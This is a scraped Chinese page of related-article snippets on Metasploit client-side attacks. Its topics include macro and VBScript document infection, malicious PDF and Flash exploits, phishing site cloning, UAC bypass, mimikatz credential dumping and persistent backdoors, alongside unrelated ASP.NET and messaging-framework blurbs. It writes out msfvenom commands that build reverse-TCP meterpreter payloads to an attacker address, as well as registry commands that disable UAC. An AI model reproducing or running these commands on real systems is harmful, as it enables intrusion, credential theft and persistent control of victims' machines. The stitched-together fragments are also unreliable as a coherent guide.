MSF——客户端渗透之VBScript感染】的更多相关文章

弱点扫描 根据信息收集的结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 误报率.漏报率 VNC密码破解 客户端渗透 VBScript感染方式 利用  宏  感染word.excel文档 绕过某些基于文件类型检查的安全机制 一般人对word.excel的格式看来是没有安全威胁的,没有防范 生成Payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1…
这个漏洞利用只在XP上有效 利用pdf漏洞利用payload exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell 构造恶意网站 exploit 生成一个网站 被攻击者点到这个网站时 攻击机就获得了一个session 提权 开启键盘记录,结果记录到以下文件中 利用flash插件漏洞执行payload 要满足这样一个条件 生成一个服务 当被攻击者点开这个网址 攻击者就收到了一个shell 类似的攻击模块还有…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
嗅探抓包 查看网卡 指定网卡,因为资源有限,默认抓满50000个包如果不dump下来,就会自动销毁掉,从0开始抓. dump嗅探到的文件到本机,传递到本机的过程是结果ssl加密的 dump了两个文件 解包 指定想要解包文件 run 搜索文件 破解弱口令 需要有一个system权限的session 使用hashdump 使用system权限的session exploit 结果保存在/tmp目录下 使用弱密码破解工具 run执行 修改MACE时间 最好的避免电子取证发现的方法:不要碰文件系统 me…
对普通权限session提权 生成一个木马 开启Apache服务 将木马上传网页 被攻击者从这个网页上获取到这个木马 攻击者开启msf侦听 当被攻击者双击这个木马文件时 攻击者就获取到一个session 进入到这个session 加载priv模块getsystem提权,但是失败了,这是由于win7系统上UAC的限制 后退 使用提权模块ask 使用刚才那个没有提权权限的session 1 exploit 被攻击者就会收到一个对话框,如果点了yes 攻击者就会收到一个session sessions…
针对Windows 开启侦听 查看payload选项 将1.exe传到网页上 win7访问网页并下载1.exe 下载好之后双击运行,在服务器端就获得了一个shell   针对linux 先获取到一个软件包 在/var/cache/apt/archives目录下查看下载的安装包 将这个安装包拷贝到home目录下,解包到free目录下 创建一个目录 创建control文件 输入以下内容 创建一个postinst文件 输入以下内容 #!/bin/sh sudo chmod 2755 /usr/game…
启动社会工程学攻击组件 生成二维码攻击模块 输入你想生成二维码的url,这里做演示用www.baidu.com 二维码生成后,在这个路径下 生成u盘,DVD的多媒体攻击载荷 通过修改autorun.inf这个文件,当被攻击主机读取U盘.DVD的设备时,注入攻击载荷. 克隆网站 1232 设置kali本机的IP 设置想要克隆的页面URL地址 在本机启动Apache服务 这样就克隆成功了, 克隆的页面存放在 当在页面输入192.168.21.31时进入的是淘宝的页面 当在这个页面输入用户名密码点登陆…
如果一个网页存在可以include外链的漏洞,我们可以利用这个漏洞include本机上的文件,从而获取web服务器的shell. 设置目标的IP 根据网页的路径设置参数 设置cookie 选择payload 设置本地IP exploit获取session…
持续后门 先获取一个session 在目标主机上生成持续后门 设置侦听参数 启动侦听 重新启动被攻击的主机 一启动攻击者时获取到session mimikatz的使用 mimikatz是俄罗斯组织开发的工具 加载mimikatz help查看命令 msv获取用户名和hash wdigest获取内存中的明文密码信息 kerberos获取内存中的明文密码信息 查看hash 查看bootkey 查看被攻击主机上运行的进程 查看被攻击主机上运行的服务 查看被攻击主机的加密条件 PHP shell 生成一…
跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s…
先获取到一个session 上传nc到被攻击主机上 建立一个键值 创建一个策略 kali上查看是否成功创建键值 后台开启cmd 查看防火墙的策略 打开防火墙的端口 添加一条防火墙策略 在win7上查看防火墙策略 win7重启之后防火墙的端口就打开了,而且开启了nc向kali发起连接 kali 侦听444端口就可以建立连接获得目标shell…
关闭UAC 如果你获得一个system权限的session 进入到这个session 进入到shell 依次输入以下命令 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTW…
四.客户端攻击      客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击.      4.1客户端渗透攻击的安全防护机制              ①DEP                 DEP(数据执行保护)基本原理是操作系统通过设置内存页的属性,指明数据所在的内存页为不可执行.              ②ASLR                …
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 应用场景: Kali机器IP:192.168.163.132 WindowsXP机器IP:192.168.163.134 利用Flash插件漏洞执行Payload: 比如使用浏览器的时候,会运行Flash插件,在这里会产生漏洞 MSF里面有很多的可用Flash漏洞,我这里先采用一个做示范: (时候我发现这里一个错误,我把IP设成端口了,但不知道为什么会…
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 前五篇文章讲解了Metasploit Framework的一些基本使用 而接下来的文章就是具体使用的案例了 渗透技术不是只明白怎么用就可以了,最重要的实践! 测试场景: Kali机器:192.168.163.132 WindowsXP机器:192.168.163.134 直接构建Payload: 通过社会工程学的方式诱骗对方下载我写好的恶意程序 针对w…
生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.ex 传到测试机执行后得到反弹shell msfconsole msf > use multi/handlermsf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(multi/handl…
已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/ask set session -id set filename use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection set session -id set payload 利用漏洞直接提权为systen use…
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:windows 7 (192.168.0.135) 攻击机:kali 2018 (192.168.0.133) 开始之前先来熟悉 Metaspolit 基本术语: Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoder…
1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > info Name: MS11-050 IE mshtml!CObjectElement Use After Free Module: exploit/windows/browser/ms11_…
metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐. 大部分时间都在学习不同工具的使用习惯,如果能统一就好了. MSF默认集成在Kali linux之中,使用postgresql数据库存储数据. MSF::Core:最底层的库,提供Msf的核心基本API,是框架的核心能力实现库. MSF::Base:基于Core库…
渗透测试者的困扰▪ 需要掌握数百个工具软件,上千个命令参数,实在记不住▪ 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐▪ 大部分时间都在学习使用不同工具的使用习惯,如果能统一就好了▪ Metasploit 能解决以上困扰吗? MSF架构 ▪ Rex – 基本功能库,用于完成日常基本任务,无需人工手动编码实现 – 处理 socket 连接访问.协议应答(http/SSL/SMB等) – 编码转换(XOR.Base64.Unicode)▪ Msf::Core – 提供 Msf 的核心…
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想.   本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含…
20145318 <网络对抗> MSF基础应用 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050:(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块 基础问题回答 exploit:通过漏洞对程序攻击的途径,是一种手段或通道. payload:具体的攻击代码 encode:伪装.隐藏 实践过程 主动攻击:MS08_067漏洞渗透攻击 开启MSF 查…
会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shell usemodule management/psinject set Listener Micr067 set ProcID 3768 execute     3.Invoke-PsExec PsExec缺点是基本杀毒软件都能检测到,并会留下日志,而且需要开启admin$…
“一切都是消息”--这是MSF(消息服务框架)的设计哲学. MSF的名字是 Message Service Framework 的简称,中文名称:消息服务框架,它是PDF.NET框架的一部分. 1,MSF诞生的背景 MSF最初来源于2009年,我们为某银行开发的基金投资分析系统,由于银行安全的原因并且这些投资资料属于机密资料,规定必须使用邮件系统来发送这些资料,但是邮件的收发不是直接针对人,而是两端的计算机程序.为了及时向客户发送这些投资资讯,我们使用WCF开发了基于邮件的通信系统.后来,从这套…
在前一篇, “一切都是消息”--MSF(消息服务框架)入门简介, 我们介绍了MSF基于异步通信,支持请求-响应通信模式和发布-订阅通信模式,并且介绍了如何获取MSF.今天,我们来看看如何使用MSF来做一个请求-响应通信模式的例子. MSF封装了WCF,所以使用MSF不能像使用WCF那样直接在客户端添加服务引用,你需要手工编写客户端代理类,这样有一个好处就是代理类写的更简单,使用更灵活.我们可以看看网友写的这篇文章<不引用服务而使用WCF,手动编写客户端代理类>,看看直接使用WCF是如何手动编写…
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163.132 WindowsXP机器IP:192.168.163.134 如果以及获取了目标服务器的控制权之后,如何扩大战果? 所以我们首先需要一个已经获取了控制权的目标机器 我直接用msfvenom工具来生成:这里的参数我在前面介绍过了,不再多说 然后我利用Apache传给WindowsXP机器: OK…
Qbot回归,已感染5.4万台计算机 近日,BAESystems的安全人员发表了一篇关于Qbot网络感知蠕虫回归的调查报告,指出已经感染了5.4万台计算机. FreeBuf百科 Qbot蠕虫,也叫Qakbot,并不是新出现的恶意软件.最早在2009年被发现,该恶意软件之所以持续发展,是因为其源代码已经被网络罪犯获取,并不断改进以逃避检测.从BAE Systems的发现来看,他们似乎已经成功了. 恶意软件描述 85%的感染系统位于美国,尤其学术.政府和医疗等行业网络受到严重打击.例如,今年年初,皇…
catalogue . 蜜罐基本概念 . Kippo: SSH低交互蜜罐安装.使用 . Dionaea: 低交互式蜜罐框架部署 . Thug . Amun malware honeypots . Glastopf web honeypot . Wordpot . Conpot SCADA/ICS honeypot . phoneyc . shockpot . MHN(Modern Honey Network) . Database Honeypots . awesome-honeypots .…
ASP.NET为开发人员提供了一整套完整的服务器控件来验证用户输入的信息是否有效.这些控件如下: 1.RequiredFieldValidator:验证一个必填字段,如果这个字段没填,那么,将不能提交信息. 2.Comparidator:比较验证.比较两个字段值是否相等,如密码和确认密码两个字段是否相等:比较一个字段与一个具体的值. 3.Rangidator:范围验证.验证一个字段是否在某个范围中,如成绩字段要是0~100范围中. 4.Regularexpression_rValidator:正…